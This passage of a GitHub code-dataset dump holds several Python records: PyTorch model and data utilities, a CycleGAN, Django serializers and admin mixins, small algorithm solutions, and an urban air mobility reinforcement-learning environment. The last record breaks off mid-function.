transform_train = transforms.Compose(\n            [\n                transforms.Resize((32, 32)),\n                transforms.ToTensor(),\n            ]\n        )\n        train_set = datasets.ImageFolder(\n            data_dir,\n            transform=transform_train,\n        )\n    else:\n        raise ValueError(f\"{name} dataset not supported!\")\n    return train_set\n\n\ndef remove_module(d):\n    # strip the \"module.\" prefix that nn.DataParallel adds to state-dict keys;\n    # a dict comprehension (not a set) keeps the original key order\n    return OrderedDict({k[len(\"module.\") :]: v for (k, v) in d.items()})\n\n\ndef fix_legacy_dict(d):\n    keys = list(d.keys())\n    if \"model\" in keys:\n        d = d[\"model\"]\n    if \"state_dict\" in keys:\n        d = d[\"state_dict\"]\n    keys = list(d.keys())\n    # remove multi-gpu module.\n    if \"module.\" in keys[1]:\n        d = remove_module(d)\n    return d\n","repo_name":"UW-Madison-Lee-Lab/SFT-PG","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"3"}
+{"seq_id":"12330492589","text":"from rest_framework import serializers\n\nfrom talent.models import ClassImage, Talent\n\n__all__ = (\n 'ClassImageSerializer',\n 'ClassImageCreateSerializer',\n 'ClassImageUpdateSerializer'\n)\n\n\nclass ClassImageSerializer(serializers.ModelSerializer):\n talent_pk = serializers.PrimaryKeyRelatedField(read_only=True, source='talent.id')\n\n class Meta:\n model = ClassImage\n fields = (\n 'pk',\n 'talent_pk',\n 'image',\n )\n\n\nclass ClassImageCreateSerializer(serializers.ModelSerializer):\n talent_pk = serializers.PrimaryKeyRelatedField(queryset=Talent.objects.all(), source='talent')\n\n class Meta:\n model = ClassImage\n fields = (\n 'talent_pk',\n 'image',\n )\n\n\nclass ClassImageUpdateSerializer(serializers.ModelSerializer):\n class Meta:\n model = ClassImage\n fields = (\n 'image',\n )\n","repo_name":"lewis810k/gori","sub_path":"django_app/talent/serializers/class_image.py","file_name":"class_image.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"287410928","text":"from collections import defaultdict\n\n\nclass FrequencyStack:\n def __init__(self):\n # maintain stacks for different frequencies\n self.counts = defaultdict(int)\n self.stacks = defaultdict(list)\n\n def append(self, val):\n self.counts[val] += 1\n self.stacks[self.counts[val]].append(val)\n\n def pop(self):\n popKey = len(self.stacks)\n popped = self.stacks[popKey].pop()\n if not self.stacks[popKey]:\n self.stacks.pop(popKey)\n self.counts[popped] -= 1\n return popped\n","repo_name":"yaeba/binary-search-solutions","sub_path":"solutions/Frequency-Stack.py","file_name":"Frequency-Stack.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"1340153187","text":"import torchvision\n\nfrom models.network_v1 import NetworkV1\nfrom models.network_v2 import NetworkV2\nfrom models.network_v3 import NetworkV3\n\n\ndef construct_model(config, num_classes, num_makes, num_types):\n if config['arch'] == 'resnext50':\n base = torchvision.models.resnext50_32x4d(pretrained=True)\n elif config['arch'] == 'resnet34':\n base = torchvision.models.resnet34(pretrained=True)\n else: # mobilenetv2\n base = torchvision.models.mobilenet_v2(pretrained=True)\n\n if config['version'] == 1:\n model = NetworkV1(base, num_classes)\n elif config['version'] == 2:\n model = NetworkV2(base, num_classes, num_makes, num_types)\n else:\n model = NetworkV3(base, num_classes, num_makes, num_types)\n\n return model\n","repo_name":"kamwoh/Car-Model-Classification","sub_path":"models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"3"}
+{"seq_id":"7261550661","text":"import torch\nfrom torch import nn\n\n\n\nclass ResidualBlock(nn.Module):\n \"\"\"\n ResidualBlock Class\n Performs two convolutions and an instance normnlization, the input is added\n to this output to form the residual block output.\n\n Args:\n input_channels (int): the number of channels to expect from a given input\n \"\"\"\n def __init__(self, input_channels):\n super().__init__()\n self.conv1 = nn.Conv2d(input_channels, input_channels, kernel_size=3, padding=1, padding_mode=\"reflect\")\n self.conv2 = nn.Conv2d(input_channels, input_channels, kernel_size=3, padding=1, padding_mode=\"reflect\")\n self.instancenorm = nn.InstanceNorm2d(input_channels)\n self.activation = nn.ReLU()\n\n def forward(self, x):\n \"\"\"Method for completing a forward pass of ResidualBlock\n\n Args:\n x (tensor): Image tensor of shape (batch_size, num_channels, heioght, width)\n \"\"\"\n original_x = x.clone()\n x = self.conv1(x)\n x = self.instancenorm(x)\n x = self.activation(x)\n x = self.conv2(x)\n x = self.instancenorm(x)\n return original_x + x\n\n\nclass ContractingBlock(nn.Module):\n \"\"\"\n Contracting Block Class\n Performs a convolution followed by a max pool operation and an optional instance norm.\n\n Args:\n input_channels (int): The number of channels to expect from a given input\n \"\"\"\n def __init__(self, input_channels, use_bn=True, kernel_size=3, activation=\"relu\"):\n super().__init__()\n self.conv1 = nn.Conv2d(input_channels, input_channels * 2, kernel_size=kernel_size, padding=1, stride=2, padding_mode=\"reflect\")\n self.activation = nn.ReLU() if activation == \"relu\" else nn.LeakyReLU(0.2)\n if use_bn:\n self.instancenorm = nn.InstanceNorm2d(input_channels * 2)\n self.use_bn = use_bn\n\n def forward(self, x):\n \"\"\"Method for completing a forward pass of COntactingBlock\n\n Args:\n x (tensor): Image tensor of shape (batch_size, n_channels, height, width)\n \"\"\"\n x = self.conv1(x)\n if self.use_bn:\n x = self.instancenorm(x)\n x = self.activation(x)\n return x\n\n\nclass ExpandingBlock(nn.Module):\n \"\"\"ExpandingBlock Class\n Performs a convolutional transpose operation ir order to upsample with optional instance norm\n\n Args:\n input_channels (int): The number of channels to expect from a gicen input\n \"\"\"\n def __init__(self, input_channels, use_bn=True):\n super().__init__()\n self.conv1 = nn.ConvTranspose2d(input_channels, input_channels //2, kernel_size=3, stride=2, padding=1, output_padding=1)\n if use_bn: \n self.instancenorm = nn.InstanceNorm2d(input_channels // 2)\n self.use_bn = use_bn\n self.activation = nn.ReLU()\n\n def forward(self, x):\n \"\"\"Method for completing a forward pass of ExpandingBlock\n\n Args:\n x (tensor): Image tensor of shape (batch_size, n_channels, height, width)\n \"\"\"\n x = self.conv1(x)\n if self.use_bn:\n x = self.instancenorm(x)\n x = self.activation(x)\n return x\n\n\nclass FeatureMapBlock(nn.Module):\n \"\"\"FeatureMapBlock Class\n The final layer of the generator\n Args:\n input_channels (int): the number of channels to expect from a given input\n output_channels (int): the number of channels to expect for a given output\n \"\"\"\n def __init__(self, input_channels, output_channels):\n super().__init__()\n self.conv = nn.Conv2d(input_channels, output_channels, kernel_size=7, padding=3, padding_mode=\"reflect\")\n \n def forward(self, x):\n \"\"\"Method for completing a forward pass of FeatureMap Block\n\n Args:\n x (tensor): Image tensor of shape (batch_size, n_channels, height, width)\n \"\"\"\n 
x = self.conv(x)\n        return x\n\n\nclass Generator(nn.Module):\n    \"\"\"Generator Class\n    2 Contracting Blocks, 9 Residual Blocks, 2 Expanding Blocks\n    Args:\n        input_channels (int): number of channels to expect from a given input\n        output_channels (int): number of channels to expect from a given output\n    \"\"\"\n    def __init__(self, input_channels, output_channels, hidden_channels=64):\n        super().__init__()\n        self.upfeature = FeatureMapBlock(input_channels, hidden_channels)\n        self.contract1 = ContractingBlock(hidden_channels)\n        self.contract2 = ContractingBlock(hidden_channels * 2)\n        res_mult = 4\n        self.res0 = ResidualBlock(hidden_channels * res_mult)\n        self.res1 = ResidualBlock(hidden_channels * res_mult)\n        self.res2 = ResidualBlock(hidden_channels * res_mult)\n        self.res3 = ResidualBlock(hidden_channels * res_mult)\n        self.res4 = ResidualBlock(hidden_channels * res_mult)\n        self.res5 = ResidualBlock(hidden_channels * res_mult)\n        self.res6 = ResidualBlock(hidden_channels * res_mult)\n        self.res7 = ResidualBlock(hidden_channels * res_mult)\n        self.res8 = ResidualBlock(hidden_channels * res_mult)\n        self.expand1 = ExpandingBlock(hidden_channels * 4)\n        self.expand2 = ExpandingBlock(hidden_channels * 2)\n        self.downfeature = FeatureMapBlock(hidden_channels, output_channels)\n        self.tanh = nn.Tanh()\n\n    def forward(self, x):\n        \"\"\"Method for completing a forward pass of the Generator\n\n        Args:\n            x (tensor): Image tensor of shape (batch_size, n_channels, height, width)\n        \"\"\"\n        x0 = self.upfeature(x)\n        x1 = self.contract1(x0)\n        x2 = self.contract2(x1)\n        x3 = self.res0(x2)\n        x4 = self.res1(x3)\n        x5 = self.res2(x4)\n        x6 = self.res3(x5)\n        x7 = self.res4(x6)\n        x8 = self.res5(x7)\n        x9 = self.res6(x8)\n        x10 = self.res7(x9)\n        x11 = self.res8(x10)\n        x12 = self.expand1(x11)\n        x13 = self.expand2(x12)\n        xn = self.downfeature(x13)\n        return self.tanh(xn)\n\n\nclass Dicriminator(nn.Module):\n    \"\"\"Discriminator Class\n\n    Args:\n        input_channels (int): the number of image input channels\n        hidden_channels (int): the initial number of discriminator convolutional filters\n    \"\"\"\n    def __init__(self, input_channels, hidden_channels=64):\n        super().__init__()\n        self.upfeature = FeatureMapBlock(input_channels, hidden_channels)\n        self.contract1 = ContractingBlock(hidden_channels, use_bn=False, kernel_size=4, activation=\"lrelu\")\n        self.contract2 = ContractingBlock(hidden_channels * 2, kernel_size=4, activation=\"lrelu\")\n        self.contract3 = ContractingBlock(hidden_channels * 4, kernel_size=4, activation=\"lrelu\")\n        self.final = nn.Conv2d(hidden_channels * 8, 1, kernel_size=1)\n\n    def forward(self, x):\n        x0 = self.upfeature(x)\n        x1 = self.contract1(x0)\n        x2 = self.contract2(x1)\n        x3 = self.contract3(x2)\n        xn = self.final(x3)\n        return xn\n","repo_name":"JuanPabloArbelaez/CycleGAN","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"2731789799","text":"import unittest\nfrom typing import Optional\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\n# O()\nclass Solution:\n def invertTree(self, root: Optional[TreeNode]) -> Optional[TreeNode]:\n if root:\n s_left = s_right = None\n if root.left:\n s_right = self.invertTree(root.left)\n if root.right:\n s_left = self.invertTree(root.right)\n root.left, root.right = s_left, s_right\n return root\n\n\nclass TestSolution(unittest.TestCase):\n def setUp(self):\n self.sol = Solution()\n\n def test_solution(self):\n self.assertEqual(1, 1)\n\n\ndef main():\n unittest.main()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"matthewcordaro/leet-code-python","sub_path":"finished/201-500/226. Invert Binary Tree/invert-binary-tree.py","file_name":"invert-binary-tree.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"73277690000","text":"from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.serializers import serialize\nfrom django.db.models import Case, Q, When\nfrom django.http import Http404, HttpResponseForbidden, JsonResponse\n\nfrom rest_framework.response import Response\n\nfrom hikster.hike.models import Activity, Trail\nfrom hikster.hike.utils import graph_edges_nodes\nfrom hikster.organizations.models import Organization\nfrom hikster.utils.models import Contact\n\n\nclass OrganizationMixin:\n section = None\n\n def __init__(self, *args, **kwargs):\n self.organization = None\n\n super().__init__(*args, **kwargs)\n\n def dispatch(self, request, *args, **kwargs):\n try:\n organization = Organization.objects.get(id=kwargs[\"organization_id\"])\n\n except Organization.DoesNotExist:\n raise Http404()\n\n try:\n organization.members.get(user=request.user)\n except ObjectDoesNotExist:\n return HttpResponseForbidden()\n\n self.organization = organization\n\n return super().dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n context[\"section\"] = self.section\n context[\"organization\"] = self.organization\n\n return context\n\n\nclass TrailDetailMixin(LoginRequiredMixin, OrganizationMixin):\n def get_common_context(self):\n context = {}\n activities = Activity.objects.values(\"id\", \"name\").order_by(\"id\")\n context[\"activities\"] = list(activities)\n context[\"map_style\"] = \"admin-trail-detail\"\n context[\"path_types\"] = Trail.PATH_TYPES\n context[\"locations\"] = list(\n self.organization.locations.values(\"location_id\", \"name\").order_by(\"name\")\n )\n trail_sections = self.organization.trail_sections.prefetch_related(\"activities\")\n context[\"trail_sections_geojson\"] = serialize(\n \"geojson\",\n trail_sections,\n geometry_field=\"shape\",\n fields=(\"pk\", \"trailsection_id\", \"name\"),\n )\n context[\"graph\"] = graph_edges_nodes(trail_sections)\n return context\n\n\nclass JsonResponseMixin(object):\n def get(self, request, *args, **kwargs):\n context = self.get_context_data(**kwargs)\n if request.is_ajax():\n return JsonResponse(context)\n return self.render_to_response(context)\n\n def get_query(self, key):\n return self.request.GET.get(key, None)\n\n\nclass FileUploadViewMixin(object):\n def _file_upload(self, request, **kwargs):\n serializer = self.get_serializer(\n data=request.data, partial=True, context={\"request\": request}\n )\n\n serializer.is_valid(raise_exception=True)\n instance = serializer.save(\n credit=request.data.get(\"credit\"),\n image_type=request.data.get(\"image_type\"),\n **kwargs\n )\n\n serializer = self.get_serializer(instance)\n return Response(serializer.data)\n\n\nclass POIViewMixin(LoginRequiredMixin, OrganizationMixin):\n poi_categories = []\n\n def get_query(self, key):\n return self.request.GET.get(key, None)\n\n def get_pois(self):\n pois = self.organization.point_of_interests.filter(\n visible_in_map=1, category__in=[1, 3, 4, 5, 6]\n )\n if self.get_query(\"category\") is not None:\n pois = pois.filter(category=self.get_query(\"category\"))\n\n if self.get_query(\"type\") is not None:\n pois = pois.filter(type=self.get_query(\"type\"))\n\n return pois.annotate(\n display_name=Case(\n When(Q(name__isnull=True) | Q(name=\"\"), then=\"type__name\"),\n default=\"name\",\n )\n )\n\n def get_common_context(self):\n context = {}\n context[\"contact_types_data\"] = [\n type_\n for type_ 
in Contact.TYPE_CHOICES\n if type_[0] in Contact.FRONTEND_TYPES\n ]\n context[\"trail_sections_geojson\"] = serialize(\n \"geojson\",\n self.organization.trail_sections,\n geometry_field=\"shape\",\n fields=(\"pk\", \"trailsection_id\", \"name\"),\n )\n other_pois = self.get_pois()\n if hasattr(self, \"object\"):\n other_pois = other_pois.exclude(pk=self.object.pk)\n\n context[\"other_pois_geojson\"] = serialize(\n \"geojson\",\n other_pois,\n geometry_field=\"shape\",\n fields=(\"pk\", \"poi_id\", \"name\"),\n )\n context[\"poi_categories\"] = self.poi_categories\n context[\"location_geojson\"] = serialize(\n \"geojson\",\n self.organization.locations.all(),\n geometry_field=\"shape\",\n fields=(\"pk\",),\n )\n return context\n","repo_name":"genie4viz/django-vue","sub_path":"hikster/admin/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":4843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"22615374111","text":"# 合并排序\n\n\ndef merge(a, p, q, r):\n L = a[p:q+1] # 这里直接利用列表切片赋值,比c中的循环复制方便\n R = a[q+1:r+1]\n L.append(4399)\n R.append(4399)\n i = 0\n j = 0\n for k in range(p, r+1):\n if L[i] <= R[j]:\n a[k] = L[i]\n i = i+1\n else:\n a[k] = R[j]\n j = j+1\n return 0 # return 是函数结束的标志,因此def函数要记得有返回类型,如果进行处理,就返回0之类的\n\n\ndef merge_sort(a, p, r):\n if p < r:\n q = int((p+r)/2)\n merge_sort(a, p, q) # 注意一点,形参在遇到return后就释放了\n merge_sort(a, q+1, r)\n merge(a, p, q, r)\n return 0\n\n\nA = eval(input('Please input a list:')) # eval去掉输入的字符串的引号,数字就是数字,变量就是变量,列表就是列表\nprint('Before sort:', A)\nmerge_sort(A, 0, len(A)-1)\nprint('After sort:', A)\n","repo_name":"shajunguang/Introduction-to-Algotithms","sub_path":"Chapter_02/Merge_Sort.py","file_name":"Merge_Sort.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23102223671","text":"import random\nfrom copy import copy\nfrom string import ascii_letters\nfrom typing import List\n\nimport gym\nfrom bluesky.tools.geo import latlondist, qdrdist, qdrpos\nfrom gym import spaces\nfrom matplotlib import pyplot as plt\nfrom mycolorpy import colorlist as mcp\n\nfrom tud_rl.agents.base import _Agent\nfrom tud_rl.envs._envs.HHOS_Fnc import to_utm\nfrom tud_rl.envs._envs.Plane import *\nfrom tud_rl.envs._envs.VesselFnc import (NM_to_meter, angle_to_2pi,\n angle_to_pi, dtr, meter_to_NM)\n\nCOLORS = [plt.rcParams[\"axes.prop_cycle\"].by_key()[\"color\"][i] for i in range(8)] + 5 * mcp.gen_color(cmap=\"tab20b\", n=20) \n\n\nclass Destination:\n def __init__(self, dt) -> None:\n # size\n self.radius = 100 # [m]\n self.spawn_radius = 1100 # [m]\n self.respawn_radius = 1300 # [m]\n \n # position\n self.lat = 10 # [deg]\n self.lon = 10 # [deg]\n self.N, self.E, _ = to_utm(self.lat, self.lon) # [m], [m]\n\n # timing\n self.dt = dt # [s], simulation time step\n self._t_close = 60 # [s], time the destination is closed after an aircraft has entered \n self._t_nxt_open = 0 # [s], current time until the destination opens again\n self._t_open_since = 0 # [s], current time since the vertiport is open\n self._was_open = True\n self.open()\n\n def reset(self):\n self.open()\n\n def step(self, planes: List[Plane]):\n \"\"\"Updates status of the destination.\n Returns:\n np.ndarray([number_of_planes,]): who entered a closed destination\n np.ndarray([number_of_planes,]): who entered an open destination\"\"\"\n # count time until next opening\n if self._is_open is False:\n self._t_nxt_open -= self.dt\n if self._t_nxt_open <= 0:\n self.open()\n else:\n self._t_open_since += self.dt\n\n # store opening status\n self._was_open = copy(self._is_open)\n\n # check who entered a closed or open destination\n entered_close = np.zeros(len(planes), dtype=bool)\n entered_open = np.zeros(len(planes), dtype=bool)\n\n for i, p in enumerate(planes):\n if p.D_dest <= self.radius: \n if self._is_open:\n entered_open[i] = True\n else:\n entered_close[i] = True\n\n # close if someone entered\n if any(entered_open):\n self.close()\n\n return entered_close, entered_open\n\n def open(self):\n self._t_open_since = 0\n self._t_nxt_open = 0\n self._is_open = True\n self.color = \"green\"\n \n def close(self):\n self._t_open_since = 0\n self._is_open = False\n self._t_nxt_open = copy(self._t_close)\n self.color = \"red\"\n\n @property\n def t_nxt_open(self):\n return self._t_nxt_open\n\n @property\n def t_close(self):\n return self._t_close\n\n @property\n def t_open_since(self):\n return self._t_open_since\n\n @property\n def is_open(self):\n return self._is_open\n\n @property\n def was_open(self):\n return self._was_open\n\n\nclass UAM(gym.Env):\n \"\"\"Urban air mobility simulation env based on the BlueSky simulator of Ellerbroek and Hoekstra.\n Note: If multi_policy is True, each plane is considered an agent. 
Otherwise, the first plane operates as a single agent.\"\"\"\n def __init__(self, \n N_agents_max :int, \n multi_policy :bool, \n prio:bool,\n full_RL:bool, \n w_coll:float, \n w_goal:float):\n super(UAM, self).__init__()\n\n # setup\n self.N_agents_max = N_agents_max\n assert N_agents_max > 1, \"Need at least two aircrafts.\"\n\n self.multi_policy = multi_policy\n self.prio = prio\n\n self.acalt = 300 # [m]\n self.actas = 15 # [m/s]\n self.actype = \"MAVIC\"\n\n if not multi_policy:\n self.history_length = 2\n\n self.full_RL = full_RL\n self.w_coll = w_coll\n self.w_goal = w_goal\n self.w = self.w_coll + self.w_goal\n\n # domain params\n self.incident_dist = 100 # [m]\n self.accident_dist = 10 # [m]\n self.clock_degs = np.linspace(0.0, 360.0, num=100, endpoint=True)\n\n # destination\n self.dt = 1.0\n self.dest = Destination(self.dt)\n\n # performance model\n self.perf = OpenAP(self.actype, self.actas, self.acalt)\n\n # config\n self.OS_obs = 5 if prio else 4\n self.obs_per_TS = 5 if prio else 4\n self.obs_size = self.OS_obs + self.obs_per_TS*(self.N_agents_max-1)\n\n self.observation_space = spaces.Box(low = np.full(self.obs_size, -np.inf, dtype=np.float32), \n high = np.full(self.obs_size, np.inf, dtype=np.float32))\n self.act_size = 1\n self.action_space = spaces.Box(low = np.full(self.act_size, -1.0, dtype=np.float32), \n high = np.full(self.act_size, +1.0, dtype=np.float32))\n self._max_episode_steps = 500\n\n # viz\n self.plot_reward = True\n self.plot_state = True\n\n atts = [\"D_TS\", \"bng_TS\", \"V_R\", \"C_T\", \"next\"]\n\n other_names = []\n for i in range(self.N_agents_max-1):\n others = [ele + ascii_letters[i] for ele in atts]\n other_names += others\n\n self.obs_names = [\"bng_goal\", \"D_goal\", \"next\", \"t_close\", \"t_open\"] + other_names\n\n def reset(self):\n \"\"\"Resets environment to initial state.\"\"\"\n self.step_cnt = 0 # simulation step counter\n self.sim_t = 0 # overall passed simulation time (in s)\n\n self.N_accs = 0 # number of accidents during episode\n self.N_incs = 0 # number of incidents during episode\n self.N_enterances_closed_d = 0 # number of enterances to the vertiport although it was closed\n\n # create some aircrafts\n self.planes:List[Plane] = []\n\n if self.multi_policy:\n self.N_planes = self.N_agents_max\n else:\n self.N_planes = np.random.choice([2, 4, 6, 8, 10])\n\n for n in range(self.N_planes):\n self.planes.append(self._spawn_plane(n, random=bool(random.getrandbits(1))))\n\n # init live times\n if self.prio:\n self.ts_alive = np.array(random.sample(population=list(range(0, 61)), k=self.N_planes))\n self.ts_alive[0] = 100\n\n # reset dest\n self.dest.reset()\n\n # init state\n self._set_state()\n self.state_init = self.state\n return self.state\n\n def _spawn_plane(self, n:int=None, random:bool=False):\n \"\"\"Spawns the n-th plane. 
Currently, the argument is not in use but might be relevant for some validation scenarios.\"\"\"\n # sample heading and speed\n hdg = float(np.random.uniform(0.0, 360.0, size=1))\n tas = float(np.random.uniform(self.actas-3.0, self.actas+3.0, size=1))\n\n if random:\n qdr = float(np.random.uniform(0.0, 360.0, size=1))\n dist = float(np.random.uniform(low=self.dest.radius, high=self.dest.spawn_radius, size=1))\n else:\n qdr = hdg\n dist = self.dest.spawn_radius\n\n # determine origin\n lat, lon = qdrpos(latd1=self.dest.lat, lond1=self.dest.lon, qdr=qdr, dist=meter_to_NM(dist))\n\n # consider behavior type\n p = Plane(role=\"RL\", dt=self.dt, actype=self.actype, lat=lat, lon=lon, alt=self.acalt, hdg=(hdg+180)%360, tas=tas) \n\n # compute initial distance to destination\n p.D_dest = latlondist(latd1=self.dest.lat, lond1=self.dest.lon, latd2=lat, lond2=lon)\n p.D_dest_old = copy(p.D_dest)\n return p\n\n def _set_state(self):\n # usual state of shape [N_planes, obs_size]\n if self.multi_policy:\n self.state = self._get_state_multi()\n\n # since we use a spatial-temporal recursive approach, we need multi-agent history as well\n else:\n self.state = self._get_state(0)\n\n if self.step_cnt == 0:\n self.s_multi_hist = np.zeros((self.history_length, self.N_planes, self.obs_size)) \n self.hist_len = 0\n self.s_multi_old = np.zeros((self.N_planes, self.obs_size))\n else:\n # update history, where most recent state component is the old state from last step\n if self.hist_len == self.history_length:\n self.s_multi_hist = np.roll(self.s_multi_hist, shift=-1, axis=0)\n self.s_multi_hist[self.history_length - 1] = self.s_multi_old\n else:\n self.s_multi_hist[self.hist_len] = self.s_multi_old\n self.hist_len += 1\n\n # overwrite old state\n self.s_multi_old = self._get_state_multi()\n\n def _get_state_multi(self) -> None:\n \"\"\"Computes the state in the multi-agent scenario.\"\"\"\n s = np.zeros((self.N_planes, self.obs_size), dtype=np.float32)\n for i, _ in enumerate(self.planes):\n s[i] = self._get_state(i)\n return s\n\n def _get_state(self, i:int) -> np.ndarray:\n \"\"\"Computes the state from the perspective of the i-th agent of the internal plane array.\n \n This is a np.array of size [3 + 4*(N_planes-1),] containing own relative bearing of goal, distance to goal, \n common four information about target ships (relative speed, relative bearing, distance, heading intersection angle),\n and time until destination opens again.\"\"\"\n\n # select plane of interest\n p = self.planes[i]\n\n # distance, bearing to goal, time alive, time to opening, time since open\n abs_bng_goal, d_goal = qdrdist(latd1=p.lat, lond1=p.lon, latd2=self.dest.lat, lond2=self.dest.lon) # outputs ABSOLUTE bearing\n bng_goal = angle_to_pi(angle_to_2pi(dtr(abs_bng_goal)) - dtr(p.hdg))\n s_i = np.array([bng_goal/np.pi,\n NM_to_meter(d_goal)/self.dest.spawn_radius,\n 1.0-self.dest.t_nxt_open/self.dest.t_close,\n 1.0-self.dest.t_open_since/self.dest.t_close])\n if self.prio:\n s_i = np.append(s_i, [1.0 if self.ts_alive[i] == np.max(self.ts_alive) else -1.0])\n\n # information about other planes\n if self.N_planes > 1:\n TS_info = []\n for j, other in enumerate(self.planes):\n if i != j:\n # relative speed\n v_r = other.tas - p.tas\n\n # bearing and distance\n abs_bng, d = qdrdist(latd1=p.lat, lond1=p.lon, latd2=other.lat, lond2=other.lon)\n bng = angle_to_pi(angle_to_2pi(dtr(abs_bng)) - dtr(p.hdg))/np.pi\n d = NM_to_meter(d)/self.dest.spawn_radius\n\n # heading intersection\n C_T = angle_to_pi(np.radians(other.hdg - p.hdg))/np.pi\n\n # 
aggregate\n j_info = [d, bng, v_r, C_T]\n\n # time alive\n if self.prio:\n j_info += [1.0 if self.ts_alive[j] == np.max(self.ts_alive) else -1.0]\n\n TS_info.append(j_info)\n\n # sort array according to distance\n TS_info = np.hstack(sorted(TS_info, key=lambda x: x[0], reverse=True)).astype(np.float32)\n\n # ghost ship padding not needed since we always demand at least two planes\n # however, we need to pad NA's as usual in single-agent LSTMRecTD3\n if (not self.multi_policy):\n desired_length = self.obs_per_TS * (self.N_agents_max-1)\n TS_info = np.pad(TS_info, (0, desired_length - len(TS_info)), 'constant', constant_values=np.nan).astype(np.float32)\n\n s_i = np.concatenate((s_i, TS_info))\n return s_i\n\n def step(self, a):\n \"\"\"Arg a:\n In multi-policy scenarios with continuous actions and no communication:\n np.array([N_planes, action_dim])\n\n In single-policy:\n _agent\"\"\"\n # increase step cnt and overall simulation time\n self.step_cnt += 1\n self.sim_t += self.dt\n \n # fly all planes in multi-policy situation\n if self.multi_policy:\n [p.upd_dynamics(a=a[i], discrete_acts=False, perf=self.perf, dest=None) for i, p in enumerate(self.planes)]\n\n # in single-policy situation, action corresponds to first plane, while the others are either RL or VFG\n else:\n cnt_agent:_Agent = a\n\n # collect states from planes\n states_multi = self._get_state_multi()\n\n for i, p in enumerate(self.planes):\n\n # fly planes depending on whether they are RL-, VFG-, or RND-controlled\n if p.role == \"RL\":\n\n # spatial-temporal recurrent\n act = cnt_agent.select_action(s = states_multi[i], \n s_hist = self.s_multi_hist[:, i, :], \n a_hist = None, \n hist_len = self.hist_len)\n\n # move plane\n p.upd_dynamics(a=act, discrete_acts=False, perf=self.perf, dest=None)\n else:\n raise NotImplementedError()\n\n # update live times\n if self.prio:\n self.ts_before_respawn = copy(self.ts_alive)\n self.ts_alive += 1\n\n # update distances to destination\n for p in self.planes:\n p.D_dest_old = copy(p.D_dest)\n p.D_dest = latlondist(latd1=p.lat, lond1=p.lon, latd2=self.dest.lat, lond2=self.dest.lon)\n\n # check destination entries\n entered_close, entered_open = self.dest.step(self.planes)\n\n # count accidents, incidents, false entries\n self._count_mistakes(entered_close)\n\n # respawning\n self._handle_respawn(entered_open)\n\n # compute state, reward, done \n self._set_state()\n self._calculate_reward(entered_close, entered_open)\n d = self._done()\n\n if self.multi_policy:\n return self.state, self.r, d, {}\n else:\n return self.state, float(self.r[0]), d, {}\n\n def _handle_respawn(self, respawn_flags):\n \"\"\"Respawns planes when they entered the open destination area or are at the outer simulation radius.\"\"\"\n for i, p in enumerate(self.planes):\n if (p.D_dest >= self.dest.respawn_radius) or respawn_flags[i]:\n \n # spawn a plane\n self.planes[i] = self._spawn_plane(i, random=False)\n \n # reset living time only due to vertiport respawning\n if self.prio:\n if respawn_flags[i]:\n self.ts_alive[i] = 0\n\n def _calculate_reward(self, entered_close:np.ndarray, entered_open:np.ndarray):\n \"\"\"Args:\n entered_close: np.ndarray([number_of_planes,]): who entered a closed destination\n entered_open: np.ndarray([number_of_planes,]): who entered an open destination\"\"\"\n r_coll = np.zeros((self.N_planes, 1), dtype=np.float32)\n r_goal = np.zeros((self.N_planes, 1), dtype=np.float32)\n\n # ------- individual reward: collision & leaving map & goal-entering/-approaching -------\n D_matrix = 
np.ones((len(self.planes), len(self.planes))) * np.inf\n        for i, pi in enumerate(self.planes):\n            for j, pj in enumerate(self.planes):\n                if i != j:\n                    D_matrix[i][j] = latlondist(latd1=pi.lat, lond1=pi.lon, latd2=pj.lat, lond2=pj.lon)\n\n        for i, pi in enumerate(self.planes):\n\n            # collision\n            D = float(np.min(D_matrix[i]))\n\n            if D <= self.accident_dist:\n                r_coll[i] -= 10.0\n\n            elif D <= self.incident_dist:\n                r_coll[i] -= 5.0\n\n            else:\n                r_coll[i] -= 1*np.exp(-D/(2*self.incident_dist))\n\n            # off-map (+5 against numerical issues)\n            if pi.D_dest > (self.dest.spawn_radius + 5.0):\n                r_coll[i] -= 5.0\n\n            # closed goal entering\n            if entered_close[i]:\n                r_goal[i] -= 5.0\n\n            # open goal entering\n            if entered_open[i]:\n\n                # check whether only one vehicle entered\n                if sum(entered_open) == 1:\n\n                    if self.prio:\n                        # check whether the vehicle had the longest living time\n                        if self.ts_before_respawn[i] == np.max(self.ts_before_respawn):\n                            r_goal[i] += 5.0\n\n                        # otherwise punish\n                        else:\n                            r_goal[i] -= 5.0\n                    else:\n                        r_goal[i] += 5.0\n\n                # bad if someone entered simultaneously\n                else:\n                    r_goal[i] -= 5.0\n\n            # open goal approaching for the one who should go next\n            if self.prio:\n                if self.dest.was_open and (self.ts_before_respawn[i] == np.max(self.ts_before_respawn)):\n                    r_goal[i] += (pi.D_dest_old - pi.D_dest)/5.0\n\n        # ------------- collective reward: goal status ----------------\n        # incentive structure\n        if self.dest.is_open:\n            r_goal -= 0.5 * self.dest.t_open_since/self.dest.t_close\n        